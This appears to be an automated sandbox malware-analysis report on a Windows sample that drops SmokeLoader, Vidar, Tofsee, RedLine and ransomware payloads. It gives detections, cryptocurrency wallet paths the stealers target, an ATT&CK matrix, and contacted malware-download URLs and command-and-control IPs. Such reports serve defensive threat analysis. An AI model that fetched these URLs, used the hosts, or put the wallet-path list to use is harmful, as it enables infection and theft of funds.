                      Source: Yara matchFile source: 3.2.ZA3cYU28Yl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.ZA3cYU28Yl.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rcvfbte.5f15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.ZA3cYU28Yl.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.333262137.00000000005B1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.333204148.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000000.327467083.0000000005AC1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.407171768.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.385289105.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.407257194.00000000005E1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.385864770.0000000002441000.00000004.00020000.sdmp, type: MEMORY
                      Yara detected Vidar stealerShow sources
                      Source: Yara matchFile source: 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 9779.exe PID: 2228, type: MEMORYSTR
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 26.3.A881.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.A881.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.A881.exe.6c0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.A881.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.443373510.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.443196839.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.404265838.00000000007F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: A881.exe PID: 7004, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                      Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmpString found in binary or memory: \Electrum\wallets\
                      Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmpString found in binary or memory: \ElectronCash\wallets\
                      Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmpString found in binary or memory: \Electrum\wallets\
                      Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmpString found in binary or memory: window-state.json
                      Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmpString found in binary or memory: \jaxx\Local Storage\
                      Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmpString found in binary or memory: exodus.conf.json
                      Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                      Source: 9779.exe, 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmpString found in binary or memory: info.seco
                      Source: 9779.exe, 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmpString found in binary or memory: ElectrumLTC
                      Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmpString found in binary or memory: \jaxx\Local Storage\
                      Source: 9779.exe, 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmpString found in binary or memory: passphrase.json
                      Source: 9779.exe, 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmpString found in binary or memory: \Ethereum\
                      Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                      Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmpString found in binary or memory: file__0.localstorage
                      Source: 9779.exe, 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmpString found in binary or memory: Ethereum
                      Source: 9779.exe, 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmpString found in binary or memory: default_wallet
                      Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmpString found in binary or memory: multidoge.wallet
                      Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                      Source: 9779.exe, 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmpString found in binary or memory: seed.seco
                      Source: 9779.exe, 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmpString found in binary or memory: keystore
                      Source: 9779.exe, 00000016.00000002.398763241.000000000087A000.00000004.00000020.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                      Source: Yara matchFile source: 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 9779.exe PID: 2228, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 27.2.B217.exe.3fb6f20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.B217.exe.3fb6f20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.B217.exe.3e7ada0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.B217.exe.405ba90.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.B217.exe.405ba90.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.B217.exe.3e7ada0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001B.00000002.479069139.0000000003E01000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.481840914.0000000004005000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.480913132.0000000003F71000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 20.1.A019.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.1.rcvfbte.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.A019.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.A019.exe.6c15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rcvfbte.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.ZA3cYU28Yl.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.ZA3cYU28Yl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.ZA3cYU28Yl.exe.5715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.ZA3cYU28Yl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.ZA3cYU28Yl.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rcvfbte.5f15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.ZA3cYU28Yl.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.333262137.00000000005B1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.333204148.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000000.327467083.0000000005AC1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.407171768.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.385289105.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.407257194.00000000005E1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.385864770.0000000002441000.00000004.00020000.sdmp, type: MEMORY
                      Yara detected Vidar stealerShow sources
                      Source: Yara matchFile source: 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 9779.exe PID: 2228, type: MEMORYSTR
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 26.3.A881.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.A881.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.A881.exe.6c0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.A881.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.443373510.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.443196839.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.404265838.00000000007F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: A881.exe PID: 7004, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1Windows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools111Input Capture1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer14Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API531Valid Accounts1Valid Accounts1Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsShared Modules1Windows Service4Access Token Manipulation1Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution1Logon Script (Mac)Windows Service4Software Packing43NTDSSystem Information Discovery227Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol4SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCommand and Scripting Interpreter3Network Logon ScriptProcess Injection613Timestomp1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol25Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaService Execution3Rc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery571VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading31Proc FilesystemVirtualization/Sandbox Evasion231Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Valid Accounts1/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronVirtualization/Sandbox Evasion231Input CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdProcess Injection613KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                      Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskHidden Files and Directories1GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 553399 Sample: ZA3cYU28Yl.exe Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 78 transfer.sh 2->78 80 host-data-coin-11.com 2->80 82 cdn.discordapp.com 2->82 90 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->90 92 Multi AV Scanner detection for domain / URL 2->92 94 Antivirus detection for URL or domain 2->94 96 15 other signatures 2->96 11 ZA3cYU28Yl.exe 2->11         started        14 rcvfbte 2->14         started        16 svchost.exe 2->16         started        18 9 other processes 2->18 signatures3 process4 signatures5 124 Contains functionality to inject code into remote processes 11->124 126 Injects a PE file into a foreign processes 11->126 20 ZA3cYU28Yl.exe 11->20         started        128 Machine Learning detection for dropped file 14->128 23 rcvfbte 14->23         started        130 Changes security center settings (notifications, updates, antivirus, firewall) 16->130 25 MpCmdRun.exe 16->25         started        27 WerFault.exe 18->27         started        process6 signatures7 98 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 20->98 100 Maps a DLL or memory area into another process 20->100 102 Checks if the current machine is a virtual machine (disk enumeration) 20->102 29 explorer.exe 12 20->29 injected 104 Creates a thread in another existing process (thread injection) 23->104 34 conhost.exe 25->34         started        process8 dnsIp9 84 185.233.81.115, 443, 49770 SUPERSERVERSDATACENTERRU Russian Federation 29->84 86 188.166.28.199, 80 DIGITALOCEAN-ASNUS Netherlands 29->86 88 12 other IPs or domains 29->88 70 C:\Users\user\AppData\Roaming\rcvfbte, PE32 29->70 dropped 72 C:\Users\user\AppData\Local\Temp\B217.exe, PE32 29->72 dropped 74 C:\Users\user\AppData\Local\Temp\A881.exe, PE32 29->74 dropped 76 14 other malicious files 29->76 dropped 140 System process connects to network (likely due to code injection or exploit) 29->140 142 Benign windows process drops PE files 29->142 144 Deletes itself after installation 29->144 146 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->146 36 9779.exe 29->36         started        39 A019.exe 29->39         started        41 A881.exe 2 29->41         started        44 2 other processes 29->44 file10 signatures11 process12 file13 106 Detected unpacking (changes PE section rights) 36->106 108 Detected unpacking (overwrites its own PE header) 36->108 110 Found evasive API chain (may stop execution after checking mutex) 36->110 122 4 other signatures 36->122 112 Multi AV Scanner detection for dropped file 39->112 114 Machine Learning detection for dropped file 39->114 116 Injects a PE file into a foreign processes 39->116 46 A019.exe 39->46         started        68 C:\Users\user\AppData\Local\...\lnagngtg.exe, PE32 41->68 dropped 49 cmd.exe 41->49         started        52 cmd.exe 41->52         started        54 sc.exe 41->54         started        118 Antivirus detection for dropped file 44->118 120 Sample uses process hollowing technique 44->120 56 WerFault.exe 3 10 44->56         started        58 B217.exe 44->58         started        signatures14 process15 file16 132 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 46->132 134 Maps a DLL or memory area into another process 46->134 136 Checks if the current machine is a virtual machine (disk enumeration) 46->136 138 Creates a thread in another existing process (thread injection) 46->138 66 C:\Windows\SysWOW64\...\lnagngtg.exe (copy), PE32 49->66 dropped 60 conhost.exe 49->60         started        62 conhost.exe 52->62         started        64 conhost.exe 54->64         started        signatures17 process18

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      ZA3cYU28Yl.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\72B9.exe100%AviraHEUR/AGEN.1212012
                      C:\Users\user\AppData\Local\Temp\B217.exe100%AviraHEUR/AGEN.1211353
                      C:\Users\user\AppData\Local\Temp\2EE4.exe100%AviraHEUR/AGEN.1212012
                      C:\Users\user\AppData\Local\Temp\9779.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\7F9A.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\A881.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\8ECE.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\9460.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\rcvfbte100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\293.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\41A3.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\3657.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\48E7.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\969F.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\B217.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\A019.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\lnagngtg.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\50E7.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\293.exe34%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\293.exe77%ReversingLabsWin32.Ransomware.StopCrypt
                      C:\Users\user\AppData\Local\Temp\48E7.exe34%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\48E7.exe77%ReversingLabsWin32.Ransomware.StopCrypt
                      C:\Users\user\AppData\Local\Temp\50E7.exe50%ReversingLabsWin32.Infostealer.Generic
                      C:\Users\user\AppData\Local\Temp\9460.exe46%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\9460.exe77%ReversingLabsWin32.Trojan.Raccoon
                      C:\Users\user\AppData\Local\Temp\969F.exe35%ReversingLabsByteCode-MSIL.Trojan.Pwsx
                      C:\Users\user\AppData\Local\Temp\A019.exe47%ReversingLabsWin32.Trojan.Generic

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      27.0.B217.exe.a90000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                      3.0.ZA3cYU28Yl.exe.400000.1.unpack100%AviraHEUR/AGEN.1123244Download File
                      15.0.rcvfbte.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      20.1.A019.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      20.0.A019.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.2.9460.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.2.A019.exe.6c15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      26.3.A881.exe.7f0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      26.2.A881.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                      22.2.9779.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.2.9460.exe.480e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      22.3.9779.exe.7f0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      42.0.B217.exe.1b0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      15.0.rcvfbte.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.0.ZA3cYU28Yl.exe.400000.0.unpack100%AviraHEUR/AGEN.1123244Download File
                      15.0.rcvfbte.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      42.0.B217.exe.1b0000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                      15.1.rcvfbte.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.0.9460.exe.480e50.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      27.0.B217.exe.a90000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      20.2.A019.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.2.ZA3cYU28Yl.exe.5715a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      26.2.A881.exe.6c0e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      16.0.9460.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      42.0.B217.exe.1b0000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                      15.2.rcvfbte.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.0.ZA3cYU28Yl.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.0.9460.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.1.ZA3cYU28Yl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      42.2.B217.exe.1b0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      3.2.ZA3cYU28Yl.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.0.ZA3cYU28Yl.exe.400000.2.unpack100%AviraHEUR/AGEN.1123244Download File
                      3.0.ZA3cYU28Yl.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.3.9460.exe.5f0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      20.0.A019.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      27.0.B217.exe.a90000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                      14.2.rcvfbte.5f15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      42.0.B217.exe.1b0000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                      20.0.A019.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.0.ZA3cYU28Yl.exe.400000.3.unpack100%AviraHEUR/AGEN.1123244Download File
                      27.2.B217.exe.a90000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      27.0.B217.exe.a90000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                      22.2.9779.exe.7d0e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      3.0.ZA3cYU28Yl.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.0.9460.exe.480e50.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://81.163.30.181/l2.exe100%Avira URL Cloudmalware
                      http://185.7.214.171:8080/6.php100%URL Reputationmalware
                      http://host-data-coin-11.com/0%URL Reputationsafe
                      http://data-host-coin-8.com/files/6961_1642089187_2359.exe17%VirustotalBrowse
                      http://data-host-coin-8.com/files/6961_1642089187_2359.exe100%Avira URL Cloudmalware
                      http://data-host-coin-8.com/game.exe0%URL Reputationsafe
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      https://api.ip.sb/ip0%URL Reputationsafe
                      http://unicupload.top/install5.exe100%URL Reputationphishing
                      http://74.201.28.62/book/KB5009812.png0%Avira URL Cloudsafe
                      http://privacy-tools-for-you-780.com/downloads/toolspab3.exe100%Avira URL Cloudmalware
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://activity.windows.comr0%URL Reputationsafe
                      http://74.201.28.62/book/KB5009812.exe0%Avira URL Cloudsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      http://data-host-coin-8.com/files/7729_1642101604_1835.exe100%Avira URL Cloudmalware
                      http://data-host-coin-8.com/files/9030_1641816409_7037.exe100%Avira URL Cloudmalware
                      https://dynamic.t0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      http://81.163.30.181/l3.exe100%Avira URL Cloudmalware
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      unicupload.top
                      		54.38.220.85
                      		truefalse
                        		high
                        host-data-coin-11.com
                        		8.209.70.0
                        		truefalse
                          		high
                          cdn.discordapp.com
                          		162.159.129.233
                          		truefalse
                            		high
                            privacy-tools-for-you-780.com
                            		8.209.70.0
                            		truefalse
                              		high
                              goo.su
                              		104.21.38.221
                              		truefalse
                                		high
                                transfer.sh
                                		144.76.136.153
                                		truefalse
                                  		high
                                  data-host-coin-8.com
                                  		8.209.70.0
                                  		truefalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://81.163.30.181/l2.exetrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://185.7.214.171:8080/6.phptrue
                                    • URL Reputation: malware
                                    		unknown
                                    http://host-data-coin-11.com/false
                                    • URL Reputation: safe
                                    		unknown
                                    http://data-host-coin-8.com/files/6961_1642089187_2359.exetrue
                                    • 17%, Virustotal, Browse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://data-host-coin-8.com/game.exefalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://unicupload.top/install5.exetrue
                                    • URL Reputation: phishing
                                    		unknown
                                    http://74.201.28.62/book/KB5009812.pngtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://privacy-tools-for-you-780.com/downloads/toolspab3.exetrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://74.201.28.62/book/KB5009812.exetrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://data-host-coin-8.com/files/7729_1642101604_1835.exetrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://data-host-coin-8.com/files/9030_1641816409_7037.exetrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://81.163.30.181/l3.exetrue
                                    • Avira URL Cloud: malware
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000006.00000002.307325279.0000019EF1E3D000.00000004.00000001.sdmpfalse
                                      		high
                                      https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmpfalse
                                        		high
                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000006.00000002.307325279.0000019EF1E3D000.00000004.00000001.sdmpfalse
                                          		high
                                          https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000006.00000002.307370022.0000019EF1E5A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306639231.0000019EF1E59000.00000004.00000001.sdmpfalse
                                            		high
                                            https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000006.00000003.306604066.0000019EF1E49000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307358112.0000019EF1E4E000.00000004.00000001.sdmpfalse
                                              		high
                                              https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmpfalse
                                                		high
                                                https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000006.00000003.306731630.0000019EF1E41000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306682310.0000019EF1E40000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307338832.0000019EF1E42000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000006.00000003.306624775.0000019EF1E60000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000006.00000003.306630585.0000019EF1E5E000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000006.00000003.284954142.0000019EF1E31000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000006.00000003.306731630.0000019EF1E41000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.306682310.0000019EF1E40000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.307338832.0000019EF1E42000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.bingmapsportal.comsvchost.exe, 00000006.00000002.307249135.0000019EF1E13000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000006.00000002.307325279.0000019EF1E3D000.00000004.00000001.sdmpfalse
                                                              		high
